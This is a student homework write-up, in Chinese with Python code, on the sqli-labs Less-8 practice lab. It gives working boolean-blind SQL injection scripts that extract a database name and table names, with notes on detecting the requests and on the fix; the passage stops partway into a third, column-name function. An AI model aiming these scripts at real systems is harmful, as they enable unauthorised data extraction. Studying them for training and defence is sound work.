第一次作业


发现页面存在注入点(本地 sqli-labs Less-8 靶场),使用布尔盲注脚本进行注入(脚本根据响应中是否出现 “You are in” 来判断条件真假,并非时间盲注):

import requests


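def inject_database(url):
    """Recover the current database name through a boolean-based blind check.

    Lab helper: the caller in this file points it at a local sqli-labs
    Less-8 page. For each of the first 19 character positions it
    binary-searches the ASCII code of ``substr(database(), i, 1)`` by sending
    ``id`` values that carry an ``ascii(...) > N`` condition. The marker text
    ``You are in`` in the response body is read as "condition true".

    Defender's view: every character costs about six or seven GET requests
    whose ``id`` parameter contains ``ascii(substr(``, so a run appears in
    access logs as a short burst of near-identical requests from one client.
    The oracle presumably exists because the page builds its query by
    concatenating ``id`` (not visible here - confirm in the lab source);
    binding ``id`` as a query parameter removes it.

    Args:
        url: Page whose ``id`` query parameter is tested.

    Returns:
        The recovered name; progress is also printed after every position.

    Raises:
        requests.RequestException: If a request fails, times out, or the
            server answers with an HTTP error status.
    """
    # Start from an empty string so the result carries no leading space
    # (matches the sibling table-name helper).
    name = ''
    for i in range(1, 20):
        # Search window is '0' (48) .. 'z' (122).
        low, high = 48, 122
        while low < high:
            middle = (low + high) // 2
            payload = "1' and ascii(substr(database(),%d,1))>%d-- " % (i, middle)
            # A timeout keeps the loop from hanging forever on a stalled server.
            r = requests.get(url, params={"id": payload}, timeout=10)
            # An HTTP error page would otherwise be silently read as "false".
            r.raise_for_status()

            if 'You are in' in r.text:
                low = middle + 1
            else:
                high = middle

        # low == high is the code point the search settled on.
        # NOTE(review): if the marker never appears for a position, the search
        # settles on 48 ('0'), so this guard never filters anything and the
        # printed name may end in '0' characters.
        if low > 32:
            name += chr(low)
        print(f"Current database name: {name}")

    print(f"Final database name: {name}")
    return name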
 
 
if __name__ == "__main__":
    # Loopback-only target: the local sqli-labs Less-8 practice page.
    inject_database("http://127.0.0.1/sqlilabs7/Less-8/index.php")

使用布尔盲注,从 information_schema.tables 中提取指定数据库的第一个表名(payload 中为 limit 0,1):

import requests
 
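def inject_table_name(url, database_name):
    """Recover the first table name of a schema via a boolean-based blind check.

    Lab helper: the caller in this file points it at a local sqli-labs
    Less-8 page. For each of the first 19 character positions it
    binary-searches the ASCII code of that character in the first row
    (``limit 0,1``) of ``information_schema.tables`` for ``database_name``.
    The marker text ``You are in`` in the response body is read as
    "condition true".

    Defender's view: the requests carry ``information_schema.tables`` and
    ``ascii(substr(`` inside the ``id`` parameter, roughly six or seven GETs
    per character, which stands out in access logs. The oracle presumably
    exists because the page concatenates ``id`` into its query (not visible
    here - confirm in the lab source); a bound parameter removes it.

    Args:
        url: Page whose ``id`` query parameter is tested.
        database_name: Schema name placed verbatim inside the quoted
            ``table_schema`` comparison.

    Returns:
        The recovered table name; progress is printed after every position.

    Raises:
        requests.RequestException: If a request fails, times out, or the
            server answers with an HTTP error status.
    """
    table_name = ''
    for i in range(1, 20):
        # Search window is '0' (48) .. 'z' (122).
        low, high = 48, 122
        while low < high:
            middle = (low + high) // 2
            payload = f"1' and ascii(substr((select table_name from information_schema.tables where table_schema='{database_name}' limit 0,1),{i},1))>{middle}-- "
            # A timeout keeps the loop from hanging forever on a stalled server.
            r = requests.get(url, params={"id": payload}, timeout=10)
            # An HTTP error page would otherwise be silently read as "false".
            r.raise_for_status()

            if 'You are in' in r.text:
                low = middle + 1
            else:
                high = middle

        # low == high is the code point the search settled on.
        # NOTE(review): if the marker never appears for a position, the search
        # settles on 48 ('0'), so this guard never filters anything and the
        # printed name may end in '0' characters.
        if low > 32:
            table_name += chr(low)

        print(table_name)

    print(f"Final table name: {table_name}")
    return table_name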
 
if __name__ == "__main__":
    # Loopback-only target: the local sqli-labs Less-8 practice page and the
    # schema name used by this exercise.
    target = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
    schema = "security"
    inject_table_name(target, schema)


import requests
 
def inject_column_name(url, databa